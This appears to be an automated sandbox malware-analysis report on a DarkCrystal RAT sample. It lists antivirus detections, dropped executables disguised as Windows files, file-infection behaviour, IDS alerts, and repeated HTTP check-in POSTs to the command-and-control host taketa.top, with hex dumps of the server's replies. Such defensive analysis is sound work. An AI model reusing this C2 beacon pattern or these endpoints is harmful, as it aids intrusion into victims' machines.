Source: C:\Recovery\SystemSettings.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Users\user\Desktop\iJCvyQAH.log	Virustotal: Detection: 25%	Perma Link
Source: C:\Users\user\Desktop\wNZUMzpS.log	Virustotal: Detection: 25%	Perma Link
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	ReversingLabs: Detection: 83%
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\fontrefcrt\WmiPrvSE.exe	ReversingLabs: Detection: 83%
Source: C:\fontrefcrt\WmiPrvSE.exe	Virustotal: Detection: 73%	Perma Link

Multi AV Scanner detection for submitted file

Source: yX8787W7de.exe	ReversingLabs: Detection: 79%
Source: yX8787W7de.exe	Virustotal: Detection: 56%			Perma Link

Machine Learning detection for dropped file

Source: C:\Recovery\SystemSettings.exe	Joe Sandbox ML: detected
Source: C:\fontrefcrt\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	Joe Sandbox ML: detected
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: yX8787W7de.exe

Joe Sandbox ML: detected

Source: yX8787W7de.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Directory created: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe			Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Directory created: C:\Program Files\Internet Explorer\en-US\31d454e2f3d20a			Jump to behavior

Source: yX8787W7de.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: yX8787W7de.exe
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.pdb source: MsintoRefcommonsvc.exe, 00000005.00000002.1885029457.00000000038EE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: conhost.exe, 0000001F.00000002.1998443695.000000001BDE3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: conhost.exe, 0000001F.00000002.1998443695.000000001BDE3000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0012A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0012A69B
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0013C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0013C220

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49736 -> 104.21.16.102:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49738 -> 104.21.16.102:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 104.21.16.102:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49740 -> 104.21.16.102:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49741 -> 104.21.16.102:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49742 -> 104.21.16.102:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49743 -> 104.21.16.102:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49744 -> 104.21.16.102:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49745 -> 104.21.16.102:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49746 -> 104.21.16.102:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: taketa.top

Source: unknown

HTTP traffic detected: POST /JavascriptPollMultigeneratordatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: taketa.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 03:17:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GXse2RoLCKT8rgKz9iWVD5zWud017pmY1UOATwvwzj5cPjVXegI5HwxouKVEiYKsMWcbEb9Id%2B9OiGIvXg2ixaBwaZSKZyyH%2FnIreAncgqjM8TrRjYMZB4kVwlMe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87a36b74fc6e9ac0-MIAalt-svc: h3=":443"; ma=86400Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css"><!--/--><![CDATA[/><!--*/ body { color: #000000; background-
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 03:17:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lm22g23MiKymyeBNY43Bg3UuI45Qd%2BYpCRchCNA2ZghTpliqBc7SX4L5hLuEcTCrGKme8WLk8WxxBECtJ3kOVl1v5EHklVYDQ2a73TefUHt%2B9w%2FqKejvko2raHTe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87a36c2e5d33db2d-MIAalt-svc: h2=":443"; ma=60Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css"><!--/--><![CDATA[/><!--*/ body { color: #000000; backgroun
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 03:18:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rtdo1gzmI34v3wCPVUo3RHSjrWe7vuB6%2F4AFHltjAHVSlPRAgbyUA%2BJJZSsC6Uxt6AOPvjz5LiKW653oUYpGbj5cM%2FCtoi%2FMAVKnr8a6q%2FIBbGoQvtbLOHedCU4A"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87a36c695cfa0351-MIAalt-svc: h3=":443"; ma=86400Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css"><!--/--><![CDATA[/><!--*/ body { color: #000000; background-color: #FFFF
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 03:18:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YkJnvly6UKfWRmQpGUOTi4dKGRxrnjFaCWIGu7pqWdyjh0DvWErWpf%2FfD0AUfFVvJK60eeXrjwsJSiYqHrOWJnd%2Bx7vJhSwlm%2FTMM1rL1YQF%2B6Hi0EEPUfl7AjS0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87a36c740dc9221e-MIAalt-svc: h2=":443"; ma=60Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 Data Ascii: 49f<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:%5bno%20address%20given%5d" /><style type="text/css"><!--/--><![CDATA[/><!--*/ body { color: #000000; background-co
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 03:18:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LlwNGy3rzV3RXDXFPdRMX%2FCG2LnhAz%2Bfq7PeY9Qg2ohwaPGfSayoZ9xlpWIznuSJF1LcwQb%2Bwg3Fx0D900WcPsN6%2Bx99cDGpZ5Io2qjKE5e53%2B3lg2JLknY8M12K"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87a36c9cbf265c7d-MIAalt-svc: h2=":443"; ma=60Data Raw: 34 39 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 